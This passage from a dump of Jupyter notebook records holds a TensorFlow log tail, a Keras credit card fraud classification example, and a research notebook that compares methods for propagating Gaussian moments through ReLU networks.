8.011\nINFO:tensorflow:Epoch 1/7, Global Step: 118\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.545sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 10.273%\nINFO:tensorflow:Current Loss: 8.993\nINFO:tensorflow:Epoch 1/7, Global Step: 128\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.416666\nINFO:tensorflow:Current Speed: 2.427sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 10.527%\nINFO:tensorflow:Current Loss: 7.904\nINFO:tensorflow:Epoch 1/7, Global Step: 138\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.160sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 1.042%\nINFO:tensorflow:Real Label: [4800 4393 3277 4393 2159 3692 4015 4800 3929 344 2816 921 1343 3407 3692\n 3059 2826 3328 1301 3345 4153 3692 4153 4814 4382 4861 4830 2923 1420 2996\n 485 3376 4302 688 1313 3623 3165 4057 4279 4651 4393 4800 98 1593 4350\n 289 2886 3787 229 3456 3748 762 1372 2841 4350 377 2908 4816 1644 1054\n 4800 4045 4806 3643 3623 144 1233 501 3643 689 538 4984 828 2908 4286\n 3059 4305 3692 567 2902 130 4045 3185 4816 3598 4814 3501 2902 3328 4350\n 160 3800 804 229 4429 4816 4888 2902 5001 1277 2533 4816 4279 2897 2218\n 4970 2897 4970 3623 2884 2849 4800 4045 4814 4970 289 689 991 289 1415\n 3692 2886 1301 3182 4792 341 3797 567]\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70651dea384efd3b043eb1baebb704abfc1227b | 7,430 | ipynb | Jupyter Notebook | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 1,542 | 2020-05-06T20:23:07.000Z | 2022-03-31T15:25:03.000Z | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 625 | 2020-05-07T10:21:15.000Z | 2022-03-31T17:19:35.000Z | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 1,616 | 2020-05-07T06:28:33.000Z | 2022-03-31T13:35:35.000Z | 25.888502 | 97 | 0.538358 | [
[
[
"# Imbalanced classification: credit card fraud detection\n\n**Author:** [fchollet](https://twitter.com/fchollet)<br>\n**Date created:** 2019/05/28<br>\n**Last modified:** 2020/04/17<br>\n**Description:** Demonstration of how to handle highly imbalanced classification problems.",
"_____no_output_____"
],
[
"## Introduction\n\nThis example looks at the\n[Kaggle Credit Card Fraud Detection](https://www.kaggle.com/mlg-ulb/creditcardfraud/)\ndataset to demonstrate how\nto train a classification model on data with highly imbalanced classes.",
"_____no_output_____"
],
[
"## First, vectorize the CSV data",
"_____no_output_____"
]
],
[
[
"import csv\nimport numpy as np\n\n# Get the real data from https://www.kaggle.com/mlg-ulb/creditcardfraud/\nfname = \"/Users/fchollet/Downloads/creditcard.csv\"\n\nall_features = []\nall_targets = []\nwith open(fname) as f:\n for i, line in enumerate(f):\n if i == 0:\n print(\"HEADER:\", line.strip())\n continue # Skip header\n fields = line.strip().split(\",\")\n all_features.append([float(v.replace('\"', \"\")) for v in fields[:-1]])\n all_targets.append([int(fields[-1].replace('\"', \"\"))])\n if i == 1:\n print(\"EXAMPLE FEATURES:\", all_features[-1])\n\nfeatures = np.array(all_features, dtype=\"float32\")\ntargets = np.array(all_targets, dtype=\"uint8\")\nprint(\"features.shape:\", features.shape)\nprint(\"targets.shape:\", targets.shape)\n",
"_____no_output_____"
]
],
[
[
"## Prepare a validation set",
"_____no_output_____"
]
],
[
[
"num_val_samples = int(len(features) * 0.2)\ntrain_features = features[:-num_val_samples]\ntrain_targets = targets[:-num_val_samples]\nval_features = features[-num_val_samples:]\nval_targets = targets[-num_val_samples:]\n\nprint(\"Number of training samples:\", len(train_features))\nprint(\"Number of validation samples:\", len(val_features))\n",
"_____no_output_____"
]
],
[
[
"## Analyze class imbalance in the targets",
"_____no_output_____"
]
],
[
[
"counts = np.bincount(train_targets[:, 0])\nprint(\n \"Number of positive samples in training data: {} ({:.2f}% of total)\".format(\n counts[1], 100 * float(counts[1]) / len(train_targets)\n )\n)\n\nweight_for_0 = 1.0 / counts[0]\nweight_for_1 = 1.0 / counts[1]\n",
"_____no_output_____"
]
],
[
[
"## Normalize the data using training set statistics",
"_____no_output_____"
]
],
[
[
"mean = np.mean(train_features, axis=0)\ntrain_features -= mean\nval_features -= mean\nstd = np.std(train_features, axis=0)\ntrain_features /= std\nval_features /= std\n",
"_____no_output_____"
]
],
[
[
"## Build a binary classification model",
"_____no_output_____"
]
],
[
[
"from tensorflow import keras\n\nmodel = keras.Sequential(\n [\n keras.layers.Dense(\n 256, activation=\"relu\", input_shape=(train_features.shape[-1],)\n ),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dropout(0.3),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dropout(0.3),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n ]\n)\nmodel.summary()\n",
"_____no_output_____"
]
],
[
[
"## Train the model with `class_weight` argument",
"_____no_output_____"
]
],
[
[
"metrics = [\n keras.metrics.FalseNegatives(name=\"fn\"),\n keras.metrics.FalsePositives(name=\"fp\"),\n keras.metrics.TrueNegatives(name=\"tn\"),\n keras.metrics.TruePositives(name=\"tp\"),\n keras.metrics.Precision(name=\"precision\"),\n keras.metrics.Recall(name=\"recall\"),\n]\n\nmodel.compile(\n optimizer=keras.optimizers.Adam(1e-2), loss=\"binary_crossentropy\", metrics=metrics\n)\n\ncallbacks = [keras.callbacks.ModelCheckpoint(\"fraud_model_at_epoch_{epoch}.h5\")]\nclass_weight = {0: weight_for_0, 1: weight_for_1}\n\nmodel.fit(\n train_features,\n train_targets,\n batch_size=2048,\n epochs=30,\n verbose=2,\n callbacks=callbacks,\n validation_data=(val_features, val_targets),\n class_weight=class_weight,\n)\n",
"_____no_output_____"
]
],
[
[
"## Conclusions\n\nAt the end of training, out of 56,961 validation transactions, we are:\n\n- Correctly identifying 66 of them as fraudulent\n- Missing 9 fraudulent transactions\n- At the cost of incorrectly flagging 441 legitimate transactions\n\nIn the real world, one would put an even higher weight on class 1,\nso as to reflect that False Negatives are more costly than False Positives.\n\nNext time your credit card gets declined in an online purchase -- this is why.",
"_____no_output_____"
]
]
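,
[
    [
        "As a sketch of that last point (the factor is an illustrative assumption, not a tuned value), making false negatives costlier just means scaling the positive class weight before calling `fit`:",
        "_____no_output_____"
    ]
],
[
    [
        "# e.g. treat a missed fraud as 5x more costly than the base weighting\n# (5.0 is a hypothetical factor for illustration only)\nstricter_class_weight = {0: weight_for_0, 1: 5.0 * weight_for_1}",
        "_____no_output_____"
    ]
]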
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70655a1725bd1bfd663ec73d498ca730e9d364e | 31,321 | ipynb | Jupyter Notebook | ADF.ipynb | ModarTensai/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 2 | 2019-04-24T20:26:55.000Z | 2019-05-29T19:43:59.000Z | ADF.ipynb | ModarTensai/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 5 | 2020-01-28T22:11:08.000Z | 2021-08-25T14:45:47.000Z | ADF.ipynb | xmodar/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 1 | 2019-04-25T11:13:20.000Z | 2019-04-25T11:13:20.000Z | 43.023352 | 991 | 0.507455 | [
[
[
"## Run package tests",
"_____no_output_____"
]
],
[
[
"# import sys\n# import unittest\n# import network_moments.torch.gaussian as gnm\n# runner = unittest.TextTestRunner(sys.stdout, verbosity=2)\n# load = unittest.TestLoader().loadTestsFromModule\n# result = runner.run(unittest.TestSuite([\n# load(gnm.relu.tests),\n# load(gnm.affine.tests),\n# load(gnm.net.adf.tests),\n# ]))",
"_____no_output_____"
]
],
[
[
"## TODOs:\n\n - Fix relu covariance in case of zero-mean and zero-variance\n - Support scalar variance for affine.batch_moments()\n - Make computing AS faster for diagonal input variance\n - Backprobagation through the moments",
"_____no_output_____"
]
],
[
[
"import torch\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets\nimport network_moments.torch.gaussian as gnm\nfrom torch.distributions import MultivariateNormal as gaussian\n\n# %matplotlib widget\nplt.style.use('dark_background')\n\ndef timeit(stmt):\n out = get_ipython().run_line_magic('timeit', '-o -q {}'.format(stmt))\n return out.average, out.stdev\n\ndef get_gaussian(dims, sigma=1, zero_mean=False, mbatch=1, vbatch=1,\n dtype=torch.float64, device='cpu'):\n mean = torch.randn(mbatch, dims, dtype=dtype, device=device) * sigma\n if zero_mean:\n mean.zero_()\n cov = gnm.utils.rand.definite(dims, norm=sigma ** 2,\n batch=vbatch, dtype=dtype, device=device)\n var = cov.diagonal(dim1=-2, dim2=-1)\n return mean, cov, var\n\n\ndef get_net(num_layers=4, dims=2, bias_in_first_layer=True, verbose=False):\n net = gnm.net.Sequential(*[\n layer for i in range(num_layers) for layer in (\n torch.nn.Linear(dims, dims, bias=bias_in_first_layer or i > 0),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).double().eval()\n if verbose:\n print(net)\n\n relu = 2 * max(num_layers - 1, 1) - 1 # index of linearization layer\n lrs = gnm.net.Sequential.split_layers(net)\n tsl = gnm.net.Sequential.encapsulate(\n net[:relu], net[relu:relu + 1], net[relu + 1:])\n if verbose:\n print('Linearizing around layer {}.'.format(relu % len(net)))\n return net, lrs, tsl\n\n\ndef get_image(loader, index):\n for images, _ in loader:\n if index < len(images):\n image = images[index:index + 1]\n index = -1\n break\n index -= len(images)\n if index >= 0:\n print('Couldn\\'t find the image at index {} !!'.format(index))\n image = None\n return image\n\n\ndef error(a, b):\n if a.size() != b.size():\n return float('inf')\n return (a - b).abs().mean().item()\n# return ((a / b) - 1).abs().mean().item()\n# return ((a - b).norm() / a.norm()).item()",
"_____no_output_____"
],
[
"cuda = False\nlenet = gnm.net.LeNet().to('cuda' if cuda else 'cpu')\nlenet.load_state_dict(torch.load('models/mnist/lenet.pt'))\nmnist_train = datasets.MNIST('data/mnist', train=True,\n transform=lenet.default_transforms())\nmnist_train_loader = torch.utils.data.DataLoader(mnist_train,\n batch_size=5000,\n pin_memory=cuda,\n num_workers=4 if cuda else 0,\n shuffle=False,\n drop_last=False)\n# print(lenet.accuracy(mnist_train_loader, 'cuda' if cuda else 'cpu'))",
"0.9975166666666667\n"
],
[
"cuda = False\nalexnet = gnm.net.AlexNet().to('cuda' if cuda else 'cpu')\nalexnet.load_state_dict(torch.load('models/imagenet/alexnet.pt'))\nimagenet_valid = datasets.ImageFolder('data/imagenet/val/',\n transform=alexnet.default_transforms())\nimagenet_valid_loader = torch.utils.data.DataLoader(imagenet_valid,\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n shuffle=False,\n drop_last=False)\n# print(alexnet.accuracy(imagenet_valid_loader, 'cuda' if cuda else 'cpu'))",
"_____no_output_____"
]
],
[
[
"## Performance comparison (forward pass vs ADF vs TSL)\n\nNOTE: ADF is 10 times slower than the forward pass and TSL is 10 times slower than ADF",
"_____no_output_____"
]
],
[
[
"# dims = 100\n# mu, cov, var = get_gaussian(dims)\n# net, lrs, tsl = get_net(num_layers=7, dims=dims)\n\n# # forward pass time\n# %timeit net(mu)\n# # 189 µs ± 1.2 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n\n# # independent ADF time\n# %timeit gnm.net.adf.gaussian(lrs, mu, var, independent=True)\n# # 1.35 ms ± 9.09 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n\n# # independent TSL time\n# %timeit gnm.net.adf.gaussian(tsl, mu, var, independent=True)\n# # 14.9 ms ± 651 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)\n\n# # TSL time\n# %timeit gnm.net.adf.gaussian(tsl, mu, cov, independent=False)\n# # 36.1 ms ± 4.11 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)",
"_____no_output_____"
]
],
[
[
"## Profile $\\mathbf{A}\\mathbf{\\Sigma}\\mathbf{A}^\\top$ if we know $\\mathbf{A}$ versus our trick\n\nWe are computing the covariance of the linearization of a neural network around a certain point. One could say that this is a memory and computation tradeoff where we can just save the linearizations and compute the covariance directly.\n\nNOTE: (Cache, Trick, ASAT) is ordered from faster to slower on both CPU and GPU",
"_____no_output_____"
]
],
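[
    [
        "The identity behind the trick: with $\\mathbf{S} = \\mathbf{\\Sigma}^{1/2}$ the symmetric matrix square root,\n\n$$\\mathbf{A}\\mathbf{\\Sigma}\\mathbf{A}^\\top = (\\mathbf{A}\\mathbf{S})(\\mathbf{A}\\mathbf{S})^\\top,$$\n\nso it is enough to evaluate the Jacobian-vector products $\\mathbf{A}\\mathbf{S}$ at the linearization point, without ever materializing $\\mathbf{A}$ itself.",
        "_____no_output_____"
    ]
],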
[
[
"def trick_fn(net, mu, cov):\n with torch.no_grad():\n AS = gnm.utils.jac_at_x(net, mu, gnm.utils.sqrtm(cov))\n return AS.t().mm(AS)\n\ndef asat_fn(net, mu, cov):\n A = gnm.utils.linearize(net, mu.view(1, -1), True)[0]\n return A.mm(cov).mm(A.t())\n\ndef cache_fn(A, cov):\n return A.mm(cov).mm(A.t())\n\ndef asat_cache_trick(device, trials=7, dim=1000, layers=10, sigma=10, dtype=torch.float64, file=None):\n try:\n dims, times = torch.load(file)\n except:\n times = []\n dims = [2**i for i in range(13, 15)]\n for n in gnm.utils.verbosify(dims):\n net = gnm.net.Sequential(*[\n layer for i in range(1, layers + 1) for layer in (\n torch.nn.Linear(n if i == 1 else dim,\n n if i == layers else dim),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).to(device, dtype).eval()\n\n mu, cov, _ = get_gaussian(n, sigma=sigma, dtype=dtype, device=device)\n mu, cov = mu[0], cov[0]\n\n t = time()\n for _ in range(trials):\n r = asat_fn(net, mu, cov)\n asat = (time() - t) / trials\n\n t = time()\n for _ in range(trials):\n r = trick_fn(net, mu, cov)\n trick = (time() - t) / trials\n \n A = gnm.utils.linearize(net, mu.view(1, -1), True)[0]\n t = time()\n for _ in range(trials):\n r = cache_fn(A, cov)\n cache = (time() - t) / trials\n \n times.append((asat, trick, cache))\n if file is not None:\n torch.save((dims, times), file)\n plt.figure()\n plt.tick_params('y', right=True)\n plt.plot(dims, [t[0] for t in times], '+-b', label='ASA^T')\n plt.plot(dims, [t[1] for t in times], '+-r', label='Trick')\n plt.plot(dims, [t[2] for t in times], '+-g', label='Cache')\n plt.ylabel('Average time in seconds')\n plt.xlabel('Number of dimensions')\n plt.xscale('log')\n plt.yscale('log')\n plt.title('Profiling on ' + str(device))\n plt.legend()\n plt.show()\n\nasat_cache_trick(device='cpu', file='data/static/asat_cpu.pt')\nasat_cache_trick(device='cuda', file='data/static/asat_gpu.pt')",
"_____no_output_____"
]
],
[
[
"## Computing the covariance of ReLU for general Gaussian input\n\nWhich is more accurate when computing the output covariance of ReLU?\n - To copy the input covariance\n - Replace the output variance with Hinton's expressions\n\nTest all four combinations {(copy, replace), (copy), (replace), ()}\n\nNOTE: The best approach is to replace",
"_____no_output_____"
]
],
[
[
"def covariance_computation(n=100, sigma=100, count=100000):\n mu = sigma * torch.randn(n, dtype=torch.float64)\n cov = gnm.utils.rand.definite(n, norm=sigma ** 2, dtype=torch.float64)\n out = gaussian(mu, cov).sample((count,)).clamp(min=0.0)\n mc_mean = out.mean(0)\n mc_cov = gnm.utils.cov(out)\n mc_var = mc_cov.diag()\n def ocov(copy=False, replace=True):\n if copy:\n out_cov = cov.clone()\n else:\n out_cov = gnm.relu.zero_mean_covariance(cov)\n if replace:\n out_mu, out_var = gnm.relu.moments(mu, cov.diag())\n out_cov.diagonal(dim1=-2, dim2=-1).copy_(out_var)\n return out_cov\n print('copy only:', error(mc_cov, ocov(True, False)))\n print('copy and replace:', error(mc_cov, ocov(True, True)))\n print('neither:', error(mc_cov, ocov(False, False)))\n print('replace:', error(mc_cov, ocov(False, True))) # gnm.relu.batch_moments is using this method\n\ncovariance_computation()",
"_____no_output_____"
]
],
[
[
"## ADF vs two-stage vs one-stage linearization tightness\n\nNOTE: 2-stage and 1-stage sometimes give the same error\n\nTODO: Binary classification visualization then test on MNIST and LeNet with two points (one is close to the decision boundary and the other is far)",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(0)\n\ndef adf_vs_sl(dims=2, num_layers=4, bias_in_first_layer=True, zero_mean=False,\n samples_count=int(1e7), sigmas=(10,), verbose=False):\n net, lrs, tsl = get_net(num_layers, dims, bias_in_first_layer, verbose)\n mu, cov, var = get_gaussian(dims, 1, zero_mean)\n samples = gaussian(mu[0] * 0, cov[0]).sample((samples_count,))\n\n errors = []\n for sigma in (gnm.utils.verbosify(sigmas) if not verbose else sigmas):\n v = sigma ** 2\n out = net(samples * sigma + mu[0])\n mc_mean = out.mean(dim=0, keepdim=True)\n mc_var = out.var(dim=0, keepdim=True)\n\n adf_m, adf_v = gnm.net.adf.gaussian(lrs, mu, var * v, independent=True)\n adf_m_err = error(mc_mean, adf_m)\n adf_v_err = error(mc_var, adf_v)\n if verbose:\n print('ADF errors :', [adf_m_err, adf_v_err])\n\n lin2_m, lin2_v = gnm.net.adf.gaussian(tsl, mu, cov * v,\n independent=False, linearize=True)\n lin2_m_err = error(mc_mean, lin2_m)\n lin2_v_err = error(mc_var, lin2_v)\n if verbose:\n print('2-stage linearization:', [lin2_m_err, lin2_v_err])\n\n lin2i_m, lin2i_v = gnm.net.adf.gaussian(tsl, mu, cov * v,\n independent=True, linearize=True)\n lin2i_m_err = error(mc_mean, lin2i_m)\n lin2i_v_err = error(mc_var, lin2i_v)\n if verbose:\n print('Indep. 2-stage lin :', [lin2i_m_err, lin2i_v_err])\n\n lin1_m, lin1_v = gnm.net.adf.gaussian(\n [lambda x: net(x)], # pylint: disable=W0108\n mu, cov * v, independent=False, linearize=True\n )\n lin1_m_err = error(mc_mean, lin1_m)\n lin1_v_err = error(mc_var, lin1_v)\n if verbose:\n print('1-stage linearization:', [lin1_m_err, lin1_v_err])\n errors.append(((adf_m_err, adf_v_err),\n (lin2i_m_err, lin2i_v_err),\n (lin2_m_err, lin2_v_err),\n (lin1_m_err, lin1_v_err)))\n\n if len(sigmas) > 1:\n plt.figure()\n plt.plot(sigmas, [e[0][0] for e in errors], 'b', label='ADF')\n plt.plot(sigmas, [e[1][0] for e in errors], 'o-w', label='Li2')\n plt.plot(sigmas, [e[2][0] for e in errors], '+-r', label='Ln2')\n plt.plot(sigmas, [e[3][0] for e in errors], 'g', label='Ln1')\n plt.ylabel('Error')\n plt.xlabel('sigma')\n plt.title('Mean Errors')\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(sigmas, [e[0][1] for e in errors], 'b', label='ADF')\n plt.plot(sigmas, [e[1][1] for e in errors], 'o-w', label='Li2')\n plt.plot(sigmas, [e[2][1] for e in errors], '+-r', label='Ln2')\n plt.plot(sigmas, [e[3][1] for e in errors], 'g', label='Ln1')\n plt.ylabel('Error')\n plt.xlabel('sigma')\n plt.title('Variance Errors')\n# plt.yscale('log')\n plt.legend()\n plt.show()\n\n\n# print('Sanity checks:') # small linearization errors\n# adf_vs_sl(num_layers=2, bias_in_first_layer=False,\n# zero_mean=True, sigmas=(1,), verbose=True)\n\nprint('\\nBehaviour of sigmas:')\nadf_vs_sl(num_layers=5, sigmas=torch.linspace(1, 10, 10).numpy().tolist())",
"_____no_output_____"
]
],
[
[
"## Variance tightness with similar computation constraints\n\nTo compute the output variance using our expressions, we need to do a number of forward passes. One might say that doing Monte-Carlo estimation using a number of samples equal to the number of forward passes we need for our expressions might actually be tighter than our method. So, we need to verify this with varying dimensionlaity and noise level.",
"_____no_output_____"
]
],
[
[
"def constrained_variance(dim=100, layers=3, sigma=1, count=10000,\n dtype=torch.float64, device='cpu'):\n for n in [2**i for i in range(1, 13)]:\n net = gnm.net.Sequential(*[\n layer for i in range(1, layers + 1) for layer in (\n torch.nn.Linear(n if i == 1 else dim,\n n if i == layers else dim),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).to(device, dtype).eval()\n relu = 2 * max(num_layers - 1, 1) - 1 # index of linearization layer\n tsl = gnm.net.Sequential.encapsulate(\n net[:relu], net[relu:relu + 1], net[relu + 1:])\n mu, cov, _ = get_gaussian(n, sigma=sigma, dtype=dtype, device=device)\n\n dist = gaussian(mu[0], cov[0])\n samples = dist.sample((count,))\n mc_var = net(samples).var(dim=0)\n\n samples = dist.sample((n,))\n small_mc_var = net(samples).var(dim=0)\n exp_var = gnm.net.adf.gaussian(tsl, mu, cov, independent=False)\n\n small_mc_error = error(mc_var, small_mc_var)\n exp_error = error(mc_var, exp_var)\n\n print(small_mc_error - exp_error)",
"_____no_output_____"
]
],
[
[
"## Gaussianity test of the output of each layer of neural networks\n\nADF is assuming that the output of each layer in the neural network is uncorrelated Gaussian.\nThe Gaussianity of data samples can be tested using either [hypothesis testing](https://link.springer.com/content/pdf/10.1007%2Fs00362-002-0119-6.pdf) (whether there is sufficient evidence that the data is Guassian or not) or by estimating the PDF as a histogram and compare it to the PDF of the best Gaussian fit. [This](https://en.wikipedia.org/wiki/Multivariate_normal_distribution#Multivariate_normality_tests) is an example of a hypothesis test for a multivariate Gaussian but first it assumes that the covariance matrix is full-rank. However, in our case, the covariance matrix is most probably rank deficient since the affine transformations are themselves rank deficient. Plus, after the ReLU some units might actually be almost determistic zero which makes this assumption even more strict. However, in this case, we can work with each element and [test its Gaussianity](https://machinelearningmastery.com/a-gentle-introduction-to-normality-tests-in-python/) independently.\n\nNOTE: Each affine after a ReLU manages, somehow, to return the distribution to Gaussian",
"_____no_output_____"
]
],
[
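[
"# Minimal per-unit normality test (added sketch), following the linked article above.\n# Assumes scipy is available; the data below is synthetic, for illustration only.\nfrom scipy.stats import shapiro\nimport torch\n\nx = torch.randn(500)  # stand-in for a single unit's activations\nstat, p = shapiro(x.numpy())\nprint('p = %.3f ->' % p, 'looks Gaussian' if p > 0.05 else 'not Gaussian')",
"_____no_output_____"
],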
[
"def fit_normal_and_display(x):\n plt.figure()\n fit = gnm.utils.stats.gaussian.fit(x)\n label = 'PDF fits ~{:.2f}%'.format(100 * fit['similarity'])\n plt.plot(fit['xs'].numpy(), fit['pdf'].numpy(), 'c', label=label)\n label = 'N({:.2f}, {:.2f}^2)'.format(fit['mean'], fit['std'])\n plt.plot(fit['xs'].numpy(), fit['fit'].numpy(), 'g', label=label)\n plt.legend()\n plt.show()\n \ndef display_layer_gaussianity(normality):\n bins = gnm.utils.stats.num_hist_bins(normality, min_bins=50)\n hist = normality.histc(bins, min=0, max=1)\n xs = torch.linspace(0, 100, bins)\n plt.figure()\n plt.plot(xs.numpy(), hist.numpy())\n plt.xlabel('Gaussianity fit')\n plt.ylabel('Number of units')\n msg = 'Mean fit: {:.2f}% ({} units : {} bins)'\n plt.title(msg.format(100 * normality.mean(), normality.numel(), bins))\n plt.show()\n \ndef network_gaussianity(net, mu, sigma, count):\n if torch.is_tensor(sigma) and sigma.numel() > 1:\n if sigma.dim() == 1:\n sigma = sigma.diag()\n else:\n sigma = gnm.utils.rand.definite(mu.numel(), norm=sigma ** 2,\n dtype=mu.dtype, device=mu.device)\n print('Testing the Gaussianity of the output of each layer in {}\\n'\n 'with a Gaussian input that has a covariance matrix of norm {}\\n'\n 'using Monte-Carlo estimation with {} samples around the image\\n'.format(\n type(net).__name__, sigma.norm(), count\n ))\n\n x = gaussian(mu.view(-1), sigma).sample((count,)).view(-1, *mu.shape[1:])\n for layer in gnm.net.Sequential.split_layers(net):\n x = layer(x)\n if isinstance(layer, gnm.utils.Flatten):\n continue\n if hasattr(layer, 'layers'):\n for el in layer.layers:\n print(el)\n else:\n print(layer)\n reshaped_x = x.view(x.size(0), -1)\n normality = gnm.utils.stats.gaussian.gaussianity(reshaped_x, std_threshold=1e-5)\n normality[normality > 0.99] = 0 # remove deterministic (variance = 0)\n# fit_normal_and_display(reshaped_x[:, normality.argmin()])\n display_layer_gaussianity(normality)",
"_____no_output_____"
],
[
"# network_gaussianity(lenet, get_image(mnist_train_loader, 1) + 127.5, sigma=64, count=1000)",
"_____no_output_____"
],
[
"# network_gaussianity(lenet, torch.randn(1, 1, 28, 28), sigma=0.3, count=1000)",
"_____no_output_____"
],
[
"# net = gnm.net.Sequential(\n# torch.nn.Linear(1, 2),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(2, 4),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(4, 15),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(15, 50),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(50, 500),\n# ).double().eval()\n# network_gaussianity(net, torch.randn(1, 1).double(), sigma=0.3, count=1000)",
"_____no_output_____"
]
],
[
[
"## Computing the output variance of affine for Gaussian input $\\mathbf{x}\\sim\\mathcal{N}\\left(\\mathbf{\\mu}, \\mathbf{\\Sigma} =\\text{diag}\\left(\\mathbf{v}\\right)\\right)$\n\nThe variance of affine ($\\mathbf{A}\\mathbf{x}+\\mathbf{b}$) is $\\text{diag}\\left(\\mathbf{A}\\mathbf{\\Sigma}\\mathbf{A}^\\top\\right) = \\text{diag}\\left(\\mathbf{A}\\text{diag}\\left(\\mathbf{v}\\right)\\mathbf{A}^\\top\\right) = (\\mathbf{A}^2)\\mathbf{v}$ (because $\\mathbf{v} \\geq \\mathbf{0}$)\n\nIf $\\mathbf{v} = \\sigma^2\\mathbf{1}$, The variance will be $\\sigma^2\\text{diag}\\left(\\mathbf{A}\\mathbf{A}^\\top\\right) = \\sigma^2\\left(\\mathbf{A}^2\\right)\\mathbf{1} = \\sigma^2\\ \\text{sum_columns}\\left(\\mathbf{A}^2\\right)$",
"_____no_output_____"
]
],
[
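[
"# Quick numerical check (added sketch) of the identity above:\n# diag(A diag(v) A^T) == (A * A) @ v, where A * A is the elementwise square.\n# A and v below are random illustrative values, not taken from the text.\nimport torch\n\nA = torch.randn(4, 6, dtype=torch.float64)\nv = torch.rand(6, dtype=torch.float64)  # non-negative variances\nlhs = A.mm(v.diag()).mm(A.t()).diag()\nrhs = (A * A).mv(v)\nprint(torch.allclose(lhs, rhs))  # expected: True",
"_____no_output_____"
],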
[
"import torch\nimport network_moments.torch.gaussian as gnm\n\nclass Net(gnm.net.Sequential):\n def __init__(self, conv=True, shallow=False):\n if conv:\n part1 = [\n torch.nn.Conv2d(3, 2, kernel_size=5),\n gnm.utils.Flatten(),\n ]\n else:\n part1 = [torch.nn.Linear(5, 72)]\n part2 = [] if shallow else [\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(10, 2),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(2, 2),\n ]\n super().__init__(\n *part1,\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(72, 10),\n *part2,\n )\n \n def mean(self, mu, var):\n '''Compute the output mean of the network for gaussian input.\n \n Args:\n mu: Input mean (Batch, *Size).\n var: The input variance (Size) or a scalar.\n \n Returns:\n The output mean of the network.\n '''\n layer = self[0]\n if not torch.is_tensor(var):\n var = torch.tensor(var, dtype=mu.dtype, device=mu.device)\n if isinstance(layer, torch.nn.Linear):\n if not isinstance(self[1], torch.nn.ReLU):\n raise ValueError('The second layer of the network must be a ReLU')\n layers = self[2:]\n w = layer.weight\n affine_mu = layer(mu)\n if var.numel() == 1:\n affine_std = ((w * w).sum(1) * var).sqrt().unsqueeze_(0)\n else:\n affine_std = (w * w).mv(var).sqrt().unsqueeze_(0)\n elif isinstance(layer, torch.nn.Conv2d):\n if not isinstance(self[1], gnm.utils.Flatten):\n raise ValueError('The second layer of the network must be a gnm.utils.Flatten')\n if not isinstance(self[2], torch.nn.ReLU):\n raise ValueError('The third layer of the network must be a ReLU')\n layers = self[3:]\n w = layer.weight\n affine_mu = self[1](layer(mu))\n if var.numel() == 1:\n var = var.repeat(1, *mu.shape[1:])\n else:\n var = var.view(1, *mu.shape[1:])\n affine_std = self[1](torch.nn.functional.conv2d(var, w**2,\n stride=layer.stride,\n padding=layer.padding,\n dilation=layer.dilation,\n groups=layer.groups).sqrt())\n else:\n msg = 'Don\\'t know how to compute the moments for {}'\n raise NotImplemented(msg.format(type(layer)))\n relu_mu = gnm.relu.mean(affine_mu, affine_std, std=True)\n return self.forward(relu_mu, layers=layers)\n \n @staticmethod\n def test_linear(shallow=True, n=7, sigma=10, count=100000, dtype=torch.float64):\n net = Net(conv=False, shallow=shallow).to(dtype)\n if not isinstance(net[0], torch.nn.Linear):\n raise ValueError('The first layer of the network must be a torch.nn.Linear')\n print(net)\n mu = sigma * torch.randn(n, net[0].in_features, dtype=dtype)\n var = sigma**2 * torch.rand(mu.size(-1), dtype=dtype)\n normal_samples = torch.distributions.MultivariateNormal(\n mu[0, ...] 
